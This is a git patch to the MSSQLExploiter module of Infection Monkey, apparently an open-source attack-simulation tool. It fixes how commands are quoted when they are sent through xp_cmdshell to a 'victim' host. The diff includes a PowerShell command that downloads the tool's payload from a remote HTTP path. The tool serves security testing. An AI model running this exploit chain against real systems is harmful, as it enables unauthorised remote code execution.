From ef63f2699b708932a7fd14a547b300062465a092 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Tue, 14 Jun 2022 11:18:00 -0400 Subject: [PATCH] Agent: Use single quotes to avoid 128 character limit The logic that splits up commands into 128 character chunks in MSSQLExploiter is flawed, which results in malformed commands being written to a batch file on the victim. By using single quotes instead of double quotes, the 128 character limit is circumvented and there's no longer any need to break up the commands. See #2018 for more details. Fixes #2018 --- monkey/infection_monkey/exploit/mssqlexec.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index b519ee422..453e875ca 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -33,16 +33,16 @@ class MSSQLExploiter(HostExploiter): TMP_FILE_NAME = "tmp_monkey.bat" TMP_DIR_PATH = "%temp%\\tmp_monkey_dir" - MAX_XP_CMDSHELL_COMMAND_SIZE = 128 + MAX_XP_CMDSHELL_COMMAND_SIZE = 12800 - XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "' - XP_CMDSHELL_COMMAND_END = '"' + XP_CMDSHELL_COMMAND_START = "xp_cmdshell '" + XP_CMDSHELL_COMMAND_END = "'" EXPLOIT_COMMAND_PREFIX = ">{payload_file_path}" CREATE_COMMAND_SUFFIX = ">{payload_file_path}" MONKEY_DOWNLOAD_COMMAND = ( "powershell (new-object System.Net.WebClient)." - "DownloadFile(^'{http_path}^' , ^'{dst_path}^')" + "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" ) def __init__(self):